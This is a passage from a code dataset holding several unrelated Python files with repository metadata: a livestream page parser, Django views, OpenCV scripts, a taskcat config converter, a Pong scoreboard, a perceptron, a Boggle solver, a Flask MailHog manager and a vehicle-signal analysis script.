result_type='not_found',\n        )\n\n    json_ld_text = json_ld_tag.string\n    if json_ld_text is None:\n        return ParseJsonLdInNicoliveWatchHtmlNotFoundResult(\n            result_type='not_found',\n        )\n\n    json_ld_data = json.loads(json_ld_text)\n\n    name = json_ld_data.get('name')\n    description = json_ld_data.get('description')\n    thumbnail_url = json_ld_data.get('thumbnailUrl', [])\n\n    publication = json_ld_data.get('publication', {})\n\n    # start_date, end_date\n    # ISO8601 timezone-aware datetime string\n    start_date = publication.get('startDate')\n    end_date = publication.get('endDate')\n\n    return ParseJsonLdInNicoliveWatchHtmlSuccessJsonLdResult(\n        result_type='success',\n        data_type='json_ld',\n        data=ParseJsonLdInNicoliveWatchHtmlSuccessJsonLdData(\n            name=name,\n            description=description,\n            thumbnail_url=thumbnail_url,\n            start_date=start_date,\n            end_date=end_date,\n        )\n    )\n","repo_name":"aoirint/liveinfopy","sub_path":"liveinfo/nicolive.py","file_name":"nicolive.py","file_ext":"py","file_size_in_byte":9835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"20346606680","text":"from first.models import *\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.views import View\n\ndef clause_list(request):\n    clauses = Clause.objects.all()\n    lst = []\n    for i in clauses:\n        current = {\n            'PK': i.pk,\n            'ID': i.ID,\n            'Text': i.text,\n            'Sentence_ID': i.sentence_ID,\n            'Frame_ID': i.frame_ID\n        }\n        lst.append(current)\n    return render(request, 'first/clauses/clauses.html', {'context': lst})\n\ndef clause_add(request):\n    url = \"clauses\"\n    choice = Sentence.objects.all()\n    arr = []\n    print(request.POST)\n    for item in choice:\n        var = {\n            'id': item.pk,\n            'value': item\n        }\n        arr.append(var)\n\n    number = 0\n    if request.POST.get('doc_select'):\n        var = request.POST.get('doc_select')\n        # characters 7 and 8 of the posted value hold the two-digit sentence id\n        number = var[7] + var[8]\n\n    for sentence in Sentence.objects.all():\n        if sentence.pk == int(number):\n            print(request.POST)\n            clause = Clause(\n                #Choice Menu\n                ID = sentence,\n                text = request.POST.get('text'),\n                sentence_ID = sentence,\n                frame_ID = request.POST.get('frame_id')\n            )\n            clause.save()\n            return redirect(url)\n    return render(request, 'first/clauses/clause_add_ajax.html', {'context': url, 'choices': arr})\n\ndef clause_change(request, detail_view_id):\n    url = 'clauses/' + str(detail_view_id)\n    clause = Clause.objects.get(pk=detail_view_id)\n    #######\n    choice = Sentence.objects.all()\n    arr = []\n    for item in choice:\n        var = {\n            'id': item.pk,\n            'value': item\n        }\n        arr.append(var)\n\n    number = 0\n    if request.POST.get('document_id'):\n        var = request.POST.get('document_id')\n        # characters 7 and 8 of the posted value hold the two-digit sentence id\n        number = var[7] + var[8]\n    #######\n\n\n    if request.POST.get('action') == 'Delete':\n        clause.delete()\n        return redirect('clauses')\n\n    if request.POST.get('action') == 'Save':\n        for sentence in Sentence.objects.all():\n            if sentence.pk == int(number):\n                print(request.POST)\n                clause = Clause(\n                    #Choice Menu\n                    ID = sentence,\n                    text = request.POST.get('text'),\n                    sentence_ID = sentence,\n                    frame_ID = request.POST.get('frame_id')\n                )\n                clause.save()\n        return redirect(url)\n\n    clause = Clause.objects.get(pk=detail_view_id)\n    current = {\n        'Type': 'Clause',\n        'sentence_id': clause.ID,\n        'text': clause.text,\n        'frame_id': clause.frame_ID,\n\n    }\n\n    return render(request, 'first/clauses/clause_change_ajax.html', {'context': current, 'choices': arr})\n\ndef clause_view(request, detail_view_id):\n    url = 'clauses/' + str(detail_view_id)\n    clause = Clause.objects.get(pk=detail_view_id)\n    ##############################\n    choice = Sentence.objects.all()\n    arr = []\n    for item in choice:\n        var = {\n            'id': item.pk,\n            'value': item\n        }\n        arr.append(var)\n    ###########################\n    current = {\n        'Type': 'Clause',\n        'sentence_id': clause.ID,\n        'text': clause.text,\n        'frame_id': clause.frame_ID,\n\n        #Document ID ??\n    }\n    if request.POST.get('action') == 'Delete':\n        clause.delete()\n        return redirect('/apps/first/clauses')\n    elif request.POST.get('action') == 'Edit':\n        return redirect(url + '/change')\n    return render(request, 'first/clauses/clause_view_ajax.html', {'context': current, 'choices': arr, 'url': url})","repo_name":"useribraim/django","sub_path":"first/views/clauses.py","file_name":"clauses.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"17927468222","text":"import cv2\nimport numpy as np\nimport os\n\nTEST_DIR='/media/bernal-tensor/Video_4_Paul/520_1140_process'\nos.chdir(TEST_DIR) \njpgs = [x for x in os.listdir(TEST_DIR) if x.endswith('.jpg')]\njpgs.sort()\nprint('jpgs[0]: {}'.format(jpgs[0]))\nsample = cv2.imread(jpgs[1])\n\nheight,width,layers=sample.shape\n\nfourcc = cv2.VideoWriter_fourcc(*'mp4v')\nwriter=cv2.VideoWriter('517_1150.mp4',fourcc,30.0,(width,height))\n\nfor jpg in jpgs:\n    writer.write(cv2.imread(jpg))\n\ncv2.destroyAllWindows()\nwriter.release()\n","repo_name":"pauldevine/keras-yolo3","sub_path":"stich_images.py","file_name":"stich_images.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}
{"seq_id":"2781345215","text":"import cv2\nimport numpy as np\n\nimg=cv2.imread('../cao2.png')\n\nkernel1 = np.ones((3, 3), np.uint8)\nkernel2 = np.ones((3, 3), np.uint8)\n\nimgGray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\n# imgBW=cv2.threshold(imgGray, 0, 255, cv2.THRESH_BINARY_INV)[1]\nimgBW= cv2.Canny(imgGray, 100, 150)\ncv2.imwrite('trial4_otsu.png', imgBW)\n\nimg1=cv2.erode(imgBW, kernel1, iterations=2)\nimg2=cv2.dilate(img1, kernel2, iterations=2)\nimg3 = cv2.bitwise_and(imgBW, img2)\nimg3= cv2.bitwise_not(img3)\nimg4 = cv2.bitwise_and(imgBW, imgBW, mask=img3)\nimgLines= cv2.HoughLinesP(img4, 15, np.pi/180, 10, minLineLength=2, maxLineGap=5)\n\nfor i in range(len(imgLines)):\n    for x1,y1,x2,y2 in imgLines[i]:\n        cv2.line(img,(x1,y1),(x2,y2),(0,255,0),2)\n\n\ncv2.imwrite('trial4.png', img)\n","repo_name":"chacoff/preOCR","sub_path":"trial/trial4.py","file_name":"trial4.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"16744043077","text":"import logging\nfrom dataclasses import dataclass, field\nfrom pathlib import Path\nfrom typing import Dict, List\n\nimport yaml\n\nfrom dataclasses_jsonschema import JsonSchemaMixin\nfrom taskcat._dataclasses import BaseConfig\nfrom taskcat.exceptions import TaskCatException\n\nLOG = logging.getLogger(__name__)\n\n\n@dataclass\nclass LegacyGlobalConfig(JsonSchemaMixin):\n    qsname: str\n    govcloud: bool = field(default=False)\n    marketplace_ami: bool = field(default=False)\n    owner: str = field(default=\"\")\n    regions: List[str] = field(default_factory=list)\n    reporting: bool = field(default=True)\n    lambda_build: bool = field(default=False)\n    s3bucket: str = field(default=\"\")\n\n\n@dataclass\nclass LegacyTestConfig(JsonSchemaMixin):\n    template_file: str\n    
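# Illustrative aside (added; the field names mirror this dataclass and LegacyGlobalConfig above, while the exact file layout is an assumption for illustration): a legacy ci/taskcat.yml is shaped roughly like\n#   global:\n#     qsname: my-project\n#     regions: [us-east-1]\n#   tests:\n#     default:\n#       template_file: template.yaml\n#       parameter_input: params.json\n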
parameter_input: str\n regions: List[str] = field(default_factory=list)\n\n\n@dataclass\nclass LegacyConfig(JsonSchemaMixin):\n global_: LegacyGlobalConfig\n tests: Dict[str, LegacyTestConfig]\n\n\ndef parse_legacy_config(project_root: Path):\n config_file = (project_root / \"ci/taskcat.yml\").expanduser().resolve()\n if not config_file.is_file():\n raise TaskCatException(f\"No config_file at {config_file}\")\n with open(str(config_file), \"r\", encoding=\"utf-8\") as file_handle:\n config_dict = yaml.safe_load(file_handle)\n # need to rename global key, as it's a python keyword\n config_dict[\"global_\"] = config_dict.pop(\"global\")\n legacy_config = LegacyConfig.from_dict(config_dict)\n tests = {}\n for test_name, test_data in legacy_config.tests.items():\n parameters = {}\n parameter_file = project_root / \"ci/\" / test_data.parameter_input\n parameter_file = parameter_file.expanduser().resolve()\n with open(str(parameter_file), \"r\", encoding=\"utf-8\") as file_handle:\n for param in yaml.safe_load(file_handle):\n parameters[param[\"ParameterKey\"]] = param[\"ParameterValue\"]\n tests[test_name] = {\n \"template\": \"templates/\" + test_data.template_file,\n \"parameters\": parameters,\n \"regions\": test_data.regions,\n }\n if not tests[test_name][\"regions\"]:\n del tests[test_name][\"regions\"]\n new_config_dict = {\n \"project\": {\n \"name\": legacy_config.global_.qsname,\n \"owner\": legacy_config.global_.owner,\n \"s3_bucket\": legacy_config.global_.s3bucket,\n \"package_lambda\": legacy_config.global_.lambda_build,\n \"regions\": legacy_config.global_.regions,\n },\n \"tests\": tests,\n }\n new_config = BaseConfig.from_dict(new_config_dict)\n LOG.warning(\n \"config is in a legacy format, support for which will be dropped in a \"\n \"future version. 
a new format config (.taskcat.yml) will be placed \"\n        \"in your project_root\"\n    )\n    new_config_path = project_root / \".taskcat.yml\"\n    if new_config_path.exists():\n        LOG.warning(\n            f\"skipping new config file creation, file already exists at \"\n            f\"{new_config_path}\"\n        )\n    else:\n        with open(str(new_config_path), \"w\", encoding=\"utf-8\") as file_handle:\n            config_dict = new_config.to_dict()\n            config_dict.pop(\"general\")\n            yaml.dump(config_dict, file_handle, default_flow_style=False)\n    return new_config\n\n\ndef legacy_overrides(legacy_override, overrides_path, override_type):\n    if legacy_override.is_file():\n        with open(str(legacy_override), \"r\", encoding=\"utf-8\") as file_handle:\n            override_params = yaml.safe_load(file_handle)\n            LOG.warning(\n                f\"overrides file {str(legacy_override)} is in legacy \"\n                f\"format, support for this format will be deprecated \"\n                f\"in a future version.\"\n            )\n        override_params = {\n            i[\"ParameterKey\"]: i[\"ParameterValue\"] for i in override_params\n        }\n        if override_type == \"global\":\n            override_params = {\"general\": {\"parameters\": override_params}}\n        if not overrides_path.exists():\n            LOG.warning(\n                f\"Converting overrides to new format and saving in \" f\"{overrides_path}\"\n            )\n            with open(str(overrides_path), \"w\", encoding=\"utf-8\") as file_handle:\n                file_handle.write(yaml.dump(override_params, default_flow_style=False))\n        else:\n            LOG.warning(\n                f\"Ignoring legacy overrides as a current format \"\n                f\"file has been found in {str(overrides_path)}\"\n            )\n","repo_name":"aws-ia/taskcat","sub_path":"taskcat/_legacy_config.py","file_name":"_legacy_config.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","stars":1116,"dataset":"github-code","pt":"37"}
{"seq_id":"16410068909","text":"from turtle import Turtle\r\n\r\n\r\nclass Scoreboard(Turtle):\r\n\r\n    def __init__(self):\r\n        super().__init__()\r\n        self.color(\"white\")\r\n        self.penup()\r\n        self.hideturtle()\r\n        self.p1_score = 0\r\n        self.p2_score = 0\r\n        self.score_recorder()\r\n\r\n    def score_recorder(self):\r\n        self.goto(-100, 190)\r\n        self.write(arg=self.p2_score, align=\"center\", font=(\"Courier\", 70, \"normal\"))\r\n        self.goto(100, 190)\r\n        self.write(arg=self.p1_score, align=\"center\", font=(\"Courier\", 70, \"normal\"))\r\n\r\n    def p1_total_score(self):\r\n        self.p1_score += 1\r\n        self.clear()\r\n        self.score_recorder()\r\n\r\n    def p2_total_score(self):\r\n        self.p2_score += 1\r\n        self.clear()\r\n        self.score_recorder()\r\n\r\n    def game_over(self):\r\n        self.goto(0, 0)\r\n        self.write(\"Game Over!\", align=\"center\", font=(\"Courier\", 70, \"normal\"))\r\n","repo_name":"dennis-no-bug/pong-with-friends","sub_path":"scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"72976975787","text":"import numpy as np\n\n\n'''\nUpdates the weights and bias\nParameters:\n\tweights -> 1D np.array of the current weights\n\tbias -> int of current bias\n\tX -> 1D np.array of the current sample\n\tY -> 1D np.array of current sample label\nReturns:\n\t[new_weights, new_bias] -> list holding the updated weights and bias\n'''\ndef updateWB(weights,bias,X,Y):\n\t\n\tnew_weights = weights + (X*Y)\n\n\tnew_bias = bias + Y\n\n\n\treturn [new_weights, new_bias]\n\n'''\nReturns the weights and bias for a perceptron\nParameters:\n\tX -> np.array of training data\n\tY -> np.array of the training data labels\nReturns:\n\tweights and bias -> tuple of two elements, the first being the weights and the second being the bias\n'''\ndef perceptron_train(X,Y):\n\n\t'''\n\tstart weights and bias at 0\n\tgo through one epoch at a time until previous w and b is equal to current w and b\n\t\teach iteration through sample, update if y not equal to prediction\n\t'''\n\t\n\t#Initialize weights and bias to 0\n\tweights = np.zeros(np.size(X,1))\n\tbias = 0\n\n\t#Boolean to keep track of whether the weights and bias have been updated on the most current epoch\n\tupdated = True\n\n\t#run while the weights and bias have been updated\n\twhile (updated):\n\n\t\t#Resets updated to False\n\t\tupdated = False\n\t\n\t\t#Iterate through all of the samples\n\t\tfor sample_index in range(len(X)):\n\n\n\t\t\t#Find the activation for each sample\n\t\t\tactivation = np.sum(weights * X[sample_index,:]) + bias\n\n\t\t\t\n\t\t\t#If the activation is incorrect, update\n\t\t\tif((activation * Y[sample_index,0]) <= 0):\n\n\t\t\t\tweights_bias = updateWB(weights, bias,X[sample_index,:],Y[sample_index])\n\t\t\t\tweights = weights_bias[0]\n\t\t\t\tbias = weights_bias[1]\n\n\t\t\t\t#Changes update to True\n\t\t\t\tupdated = True\n\n\n\treturn weights, bias\n\n\n'''\nTests a trained perceptron and reports its accuracy\nParameters:\n\tX_test -> np.array of testing data\n\tY_test -> np.array of the testing data labels\n\tw -> 1D np.array of the weights\n\tb -> integer bias\nReturns:\n\taccuracy -> float, the fraction of test samples classified correctly\n'''\ndef perceptron_test(X_test, Y_test, w, b):\n\n\n\t#Initializes the count_correct to 0\n\tcount_correct = 0\n\n\t#Iterates through all of the testing samples\n\tfor sample_index in range(len(X_test)):\n\n\t\t#Calculates the activation for each sample\n\t\tactivation = np.sum(w * X_test[sample_index,:]) + b\n\n\n\t\t#If the activation is correct (activation * label is positive) increment count_correct\n\t\tif (activation * Y_test[sample_index,0] > 0):\n\n\t\t\tcount_correct += 1\n\n\t#Return the count correct divided by the number of samples\n\treturn(count_correct/len(X_test))\n\n","repo_name":"jhosea/CS491_Project2","sub_path":"hosea_talavera_project2/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"35419265785","text":"import random\nfrom collections import namedtuple\nfrom populate import sqlite3, DB, LETTERS\n\nCUBES = (\n    list(\"rulwig\"),\n    [\"qu\"] + list(\"jobam\"),\n    list(\"ivgetn\"),\n    list(\"yelguk\"),\n    list(\"zadven\"),\n    list(\"yifeeh\"),\n    list(\"dacpem\"),\n    list(\"todkun\"),\n    list(\"newsod\"),\n    list(\"smahor\"),\n    list(\"siphen\"),\n    list(\"putles\"),\n    list(\"tilbay\"),\n    list(\"lascre\"),\n    list(\"coitaa\"),\n    list(\"xirfob\"),\n)\n\nclass Boggle:\n\n    def __init__(self):\n        indexes = list(range(16))\n        random.shuffle(indexes)\n        self.board = [[random.choice(CUBES[indexes.pop(0)]) for _ in range(4)] for _ in range(4)] #naive board\n    \n    def show(self):\n        def pad(r):\n            if len(r) == 1:\n                return r + \" \"  # pad single letters so columns line up with \"qu\"\n            return r\n        print(\"--\")\n        print(\"\\n\".join(\" \".join(pad(r)) for r in self.board))\n        print(\"--\")\n    \n    def paths(self):\n        DIRS = (\n            (1, 0),\n            (-1, 0),\n            (0, 1),\n            (0, -1), #^STRAIGHTS \\/ DIAGONALS\n            (-1, 1),\n            (1, -1),\n            (1, 1),\n            (-1, -1),\n        )\n        Node = namedtuple(\"Node\", [\"coords\", \"character\", \"parent\", \"path\"])\n        size = 4\n        seen = set()\n        for y, row in enumerate(self.board):\n            for x, character in enumerate(row):\n                queue = []\n                
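# Added note (commentary, not in the original): each board cell seeds its own BFS with a root Node; Node is the namedtuple defined above, e.g.\n#   Node(coords=(x, y), character='a', parent=None, path=[])\n# and the `len(node.path) > 5` check below caps how deep each search runs.\n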
queue.append(Node((x, y), character, None, []))\n                while queue:\n                    node = queue.pop(0)\n                    if len(node.path) > 5:\n                        break\n                    for dx, dy in DIRS:\n                        child_coords = (node.coords[0]+dx, node.coords[1]+dy)\n                        if child_coords[0] < 0 or child_coords[0] >= size or child_coords[1] < 0 or child_coords[1] >= size:\n                            continue\n                        if child_coords not in node.path:\n                            child = Node(child_coords, self.board[child_coords[1]][child_coords[0]], node, node.path + [node.coords])\n                            queue.append(child)\n                    word = \"\"\n                    while child:\n                        word = child.character + word\n                        child = child.parent\n                    if word not in seen:\n                        seen.add(word)\n                        yield word\n\n    def words(self):\n        conn = sqlite3.connect(DB)\n        c = conn.cursor()\n        for path in self.paths():\n            c.execute(\"SELECT value FROM commonwords WHERE value = ?\", (path,))\n            fetch = c.fetchone()\n            if fetch:\n                yield fetch[0]\n        conn.commit()\n        conn.close()\n\ndef test_average():\n    num_words_observed = []\n    for _ in range(100):\n        b = Boggle()\n        b.show()\n        num_words = len(list(b.words()))\n        print(f\"Has {num_words} words\")\n        num_words_observed.append(num_words)\n    print(f\"Average: {sum(num_words_observed) / len(num_words_observed)}\")\n\nif __name__ == \"__main__\":\n    b = Boggle()\n    b.show()\n    print(\"Loading words...\")\n    words = set(b.words())\n    print(f\"Found {len(words)} words.\")\n    #print(\", \".join(words))\n    guessed = set()\n    correct_guesses = set()\n    while True:\n        b.show()\n        print(\"You've gotten: {}\".format(\", \".join(correct_guesses)))\n        print(\"{} remaining.\".format(len(words) - len(correct_guesses)))\n        guess = input(\"Enter a word: \")\n        if guess in guessed:\n            print(\"Already guessed that word.\")\n        elif guess in words:\n            guessed.add(guess)\n            correct_guesses.add(guess)\n            print(\"Got it!\")\n        else:\n            guessed.add(guess)\n            print(\"Not a word.\")\n","repo_name":"jeromew21/boggle-solver","sub_path":"boggle.py","file_name":"boggle.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"15149924800","text":"from flask import Flask\nfrom flask import request\nfrom gevent.pywsgi import WSGIServer\nimport os\nimport docker\nimport json\n\nversion = str(os.environ['VERSION'])\ndomain = str(os.environ['DOMAIN'])\n\napp = Flask(__name__)\n\nclient = docker.from_env()\n\ndef list_mailhog_containers():\n    return client.containers.list(filters={\"label\":\"mailhog.name\"})\n\ndef find_container(name):\n    containers = list_mailhog_containers()\n    return list(filter(lambda x: x.labels['mailhog.name'] == name, containers))\n\ndef get_public_port(container, port):\n    return container.attrs['NetworkSettings']['Ports'][port][0]['HostPort']\n\ndef container_to_dto(c):\n    return {\n        \"name\": c.labels['mailhog.name'], \n        \"smtp\": domain + \":\" + get_public_port(c, '1025/tcp'),\n        \"ui\": \"http://\" + domain + \":\" + get_public_port(c, '8025/tcp')\n    }\n\n@app.route(\"/\")\ndef root():\n    return app.send_static_file('index.html')\n\n@app.route(\"/api/healthCheck\")\ndef health_check():\n    return \"{\\\"success\\\":true,\\\"version\\\":\\\"\" + version + \"\\\"}\\n\"\n\n@app.route(\"/api/list\")\ndef list_containers():\n    containers = list_mailhog_containers()\n    container_list = list(map(container_to_dto, containers))\n    return json.dumps(container_list)\n\n@app.route(\"/api/create/<name>\", methods=['POST'])\ndef create(name):\n    container_find = find_container(name)\n    if container_find:\n        return \"{\\\"error\\\":\\\"\" + name + \" is already used\\\"}\", 400\n    else:\n        client.containers.run(image=\"mailhog/mailhog\", 
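# Added note (an assumption based on the docker SDK's documented semantics, not a claim from this repo): this call is roughly equivalent to `docker run -d -P --label mailhog.name=<name> mailhog/mailhog`, letting Docker pick free host ports that get_public_port() reads back.\n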
detach=True, labels={\"mailhog.name\":name}, publish_all_ports=True)\n        return \"{}\"\n\n@app.route(\"/api/delete/<name>\", methods=['POST'])\ndef delete(name):\n    container_find = find_container(name)\n    if not container_find:\n        return \"{\\\"error\\\":\\\"\" + name + \" is not found\\\"}\", 404\n    else:\n        client.containers.get(container_find[0].id).remove(force=True)\n        return \"{}\"\n\nif __name__ == \"__main__\":\n    http_server = WSGIServer(('', 5000), app)\n    http_server.serve_forever()\n","repo_name":"Ksisu/mailhog-mgr","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"30203869644","text":"import numpy as np\nimport pandas as pd\nimport dataframe_image as dfi\nimport ansiglist\nimport collections, numpy\n\n'''\n1. Shift gear engagement frequency\n2. Select direction engagement frequency\n - Odd H/L\n - Even H/L\n3. MCU temp graph / max temp / mean temp : iom_Mcu_MotTemp_C\n4. Slope graph : Slope\n/5. CPU load distribution / max CPU load : Os_GusCPULoad_[0]/[1]/[2]\n6. Brake on/off ratio : BrakeSwitchLocal\n7. Total driving time\n8. Total driving distance (odometer) : iom_Clu_Odometer\n9. Clutch drive gear shift count and control time ratio : csm_DrivingGear\n10. Clutch shift count (deleted: Clutch Motor Turn On Count)\n/11. Clutch motor turn-on control time\n12. Altitude (height) min / max / mean : ALTITUDE\n13. Mean outside air temperature : CR_Fatc_OutTemp\n14. APS ratio : APS\n15. Vehicle speed ratio : iom_VSP16\n'''\n\ndef run(AnalySig):\n    ''' 15. Vehicle speed ratio '''\n    vehicle_speed_interval = pd.cut(AnalySig['iom_VSP16'],[0,30,50,70,90,120,180], right=False, include_lowest=True,precision=2) # arg 1: array / arg 2: bin edges / right: whether intervals are closed on the right / include_lowest=True: include the lowest value\n    Analy_15 = AnalySig['iom_VSP16'].groupby([vehicle_speed_interval]).count()*0.01\n    Analy_15['Driving Total Time'] = AnalySig['iom_VSP16'].count()*0.01\n    print(Analy_15)\n\n    ''' 14. APS ratio (excluding 0) '''\n    APS_interval = pd.cut(AnalySig['APS'],[0,10,20,30,40,50,70,100], right=True, include_lowest=False,precision=2) # arg 1: array / arg 2: bin edges / right: whether intervals are closed on the right / include_lowest=True: include the lowest value\n    Analy_14 = AnalySig['APS'].groupby([APS_interval]).count()*0.01\n    print(Analy_14)\n\n    ''' 13. Mean outside air temperature '''\n    Analy_13 = AnalySig['CR_Fatc_OutTemp'].mean()\n    Analy_13 = pd.DataFrame([Analy_13],index=['outside air temp.'])\n    print(Analy_13)\n\n    ''' 12. Altitude (height) min / max / mean : ALTITUDE '''\n    height_min = AnalySig['ALTITUDE'].min()\n    height_max = AnalySig['ALTITUDE'].max()\n    height_mean = AnalySig['ALTITUDE'].mean()\n    Analy_12 = pd.Series([height_min,height_max,height_mean],index=['height_min','height_max','height_mean'])\n    print(Analy_12)\n\n    ''' 10. Clutch shift count : csm_DrivingGear '''\n    clutch_Shift_gear_change = []\n    i=0\n    while i < len(AnalySig['csm_DrivingGear'])-1:\n        if i==0:\n            clutch_Shift_gear_change.append(AnalySig['csm_DrivingGear'][i])\n        if AnalySig['csm_DrivingGear'][i+1] != AnalySig['csm_DrivingGear'][i]:\n            if AnalySig['csm_DrivingGear'][i] == 'g1' or AnalySig['csm_DrivingGear'][i] == 'g3' or AnalySig['csm_DrivingGear'][i] =='g5':\n                if AnalySig['csm_DrivingGear'][i+1] == 'g2' or AnalySig['csm_DrivingGear'][i+1] == 'g4' or AnalySig['csm_DrivingGear'][i+1] =='g6':\n                    clutch_Shift_gear_change.append(AnalySig['csm_DrivingGear'][i+1])\n            if AnalySig['csm_DrivingGear'][i] == 'g2' or AnalySig['csm_DrivingGear'][i] == 'g4' or AnalySig['csm_DrivingGear'][i] =='g6':\n                if AnalySig['csm_DrivingGear'][i+1] == 'g1' or AnalySig['csm_DrivingGear'][i+1] == 'g3' or AnalySig['csm_DrivingGear'][i+1] =='g5':\n                    clutch_Shift_gear_change.append(AnalySig['csm_DrivingGear'][i+1])\n        i+=1\n\n    clutch_Shift_gear_change = pd.DataFrame(clutch_Shift_gear_change,columns=['clutch_Shift_gear_change'])\n    odd_clutch_Shift_count = clutch_Shift_gear_change[(clutch_Shift_gear_change['clutch_Shift_gear_change']=='g1')|\n                                                      (clutch_Shift_gear_change['clutch_Shift_gear_change']=='g3')|\n                                                      (clutch_Shift_gear_change['clutch_Shift_gear_change']=='g5')].count()\n\n    even_clutch_Shift_count = clutch_Shift_gear_change[(clutch_Shift_gear_change['clutch_Shift_gear_change']=='g2')|\n                                                       (clutch_Shift_gear_change['clutch_Shift_gear_change']=='g4')|\n                                                       (clutch_Shift_gear_change['clutch_Shift_gear_change']=='g6')].count()\n\n    Analy_10 = pd.Series([odd_clutch_Shift_count['clutch_Shift_gear_change'],even_clutch_Shift_count['clutch_Shift_gear_change']],index=['odd_clutch_Shift_count','even_clutch_Shift_count'])\n    Analy_10['clutch_shift_count'] = len(clutch_Shift_gear_change)\n    print(Analy_10)\n\n    ''' 9. Clutch drive gear shift count and control time ratio : csm_DrivingGear '''\n    ''' 9-1. Shift count per clutch drive gear '''\n    clutch_Shift_gear_change = []\n    i=0\n    while i < len(AnalySig['csm_DrivingGear'])-1:\n        if i==0:\n            clutch_Shift_gear_change.append(AnalySig['csm_DrivingGear'][i])\n        if AnalySig['csm_DrivingGear'][i+1] != AnalySig['csm_DrivingGear'][i]:\n            clutch_Shift_gear_change.append(AnalySig['csm_DrivingGear'][i+1])\n        i+=1\n\n    clutch_each_gear_count = collections.Counter(clutch_Shift_gear_change)\n    clutch_each_gear_count = pd.DataFrame.from_dict([clutch_each_gear_count]).T\n    clutch_each_gear_count.sort_index(inplace=True)\n    clutch_each_gear_count.columns=['clutch_each_gear_count']\n\n    ''' 9-2. Clutch control time ratio '''\n    clutch_each_gear_ContTime = collections.Counter(AnalySig['csm_DrivingGear'])\n    clutch_each_gear_ContTime = pd.DataFrame.from_dict([clutch_each_gear_ContTime]).T\n    clutch_each_gear_ContTime.sort_index(inplace=True)\n    clutch_each_gear_ContTime=clutch_each_gear_ContTime*0.01\n    clutch_each_gear_ContTime.columns=['clutch_each_gear_ContTime']\n\n    print(clutch_each_gear_count)\n    print(clutch_each_gear_ContTime)\n\n    Analy_9 = pd.concat([clutch_each_gear_count,clutch_each_gear_ContTime],axis=1) # axis=1: concatenate column-wise\n    print(Analy_9)\n\n    ''' 8. Total driving distance '''\n    Analy_8= AnalySig['iom_Clu_Odometer'][len(AnalySig['iom_Clu_Odometer'])-1] - AnalySig['iom_Clu_Odometer'][0]\n    Analy_8 = pd.DataFrame([Analy_8],index=['vehicle mileage'])\n    print(Analy_8)\n\n\n    ''' 7. Total driving time '''\n    Analy_7 = AnalySig['time'][len(AnalySig['time'])-1]\n    Analy_7 = pd.DataFrame([Analy_7], index=['vehicle driving time'])\n    print(Analy_7)\n\n    ''' 6. Brake on/off ratio '''\n    brake_on = AnalySig[AnalySig['BrakeSwitchLocal']==\"BS_BrakeON\"]['BrakeSwitchLocal'].count()*0.01\n    brake_off = AnalySig[AnalySig['BrakeSwitchLocal']==\"BS_BrakeOFF\"]['BrakeSwitchLocal'].count()*0.01\n    Analy_6 = pd.Series([brake_on,brake_off],index=['brake on','brake off'])\n    print(Analy_6)\n\n    ''' 4. Slope ratio per bin : Slope '''\n    Slope_interval = pd.cut(AnalySig['Slope'],[-20,-10,-5,-3,0,3,5,10,20], right=True, include_lowest=False,precision=2) # arg 1: array / arg 2: bin edges / right: whether intervals are closed on the right / include_lowest=True: include the lowest value\n    Analy_4 = AnalySig['Slope'].groupby([Slope_interval]).count()*0.01\n    print(Analy_4)\n\n    ''' 3. MCU temp graph / max temp / mean temp : iom_Mcu_MotTemp_C '''\n    mcu_temp_max = AnalySig['iom_Mcu_MotTemp_C'].max()\n    mcu_temp_mean = AnalySig['iom_Mcu_MotTemp_C'].mean()\n    Analy_3 = pd.DataFrame([mcu_temp_mean,mcu_temp_max],index=['mcu_temp_mean','mcu_temp_max'])\n    print(Analy_3)\n\n    ''' 2. Select direction engagement frequency (odd H/L, even H/L) '''\n    odd_H_sel_count = []\n    odd_L_sel_count = []\n    even_H_sel_count = []\n    even_L_sel_count = []\n    i=0\n    while i < len(AnalySig['gam_SelActPos1']):\n        if AnalySig['gam_SelActPos1'][i] == 0:\n            while True:\n                i+=1\n                if AnalySig['gam_SelActPos1'][i] == 7:\n                    odd_H_sel_count.append(1)\n                    break\n                if i == len(AnalySig['gam_SelActPos1'])-1:\n                    break\n        if AnalySig['gam_SelActPos1'][i] == 7:\n            while True:\n                i+=1\n                if AnalySig['gam_SelActPos1'][i] == 0:\n                    odd_L_sel_count.append(1)\n                    break\n                if i == len(AnalySig['gam_SelActPos1'])-1:\n                    break\n        i+=1\n\n    i=0\n    while i < len(AnalySig['gam_SelActPos2']):\n        if AnalySig['gam_SelActPos2'][i] == 0:\n            while True:\n                i+=1\n                if AnalySig['gam_SelActPos2'][i] == 7:\n                    even_H_sel_count.append(1)\n                    break\n                if i == len(AnalySig['gam_SelActPos2'])-1:\n                    break\n        if AnalySig['gam_SelActPos2'][i] == 7:\n            while True:\n                i+=1\n                if AnalySig['gam_SelActPos2'][i] == 0:\n                    even_L_sel_count.append(1)\n                    break\n                if i == len(AnalySig['gam_SelActPos2'])-1:\n                    break\n        i+=1\n\n    Analy_2 = pd.DataFrame([len(odd_L_sel_count),len(odd_H_sel_count),len(even_L_sel_count),len(even_H_sel_count)],\n                           index=['odd_L_sel_count', 'odd_H_sel_count', 'even_L_sel_count', 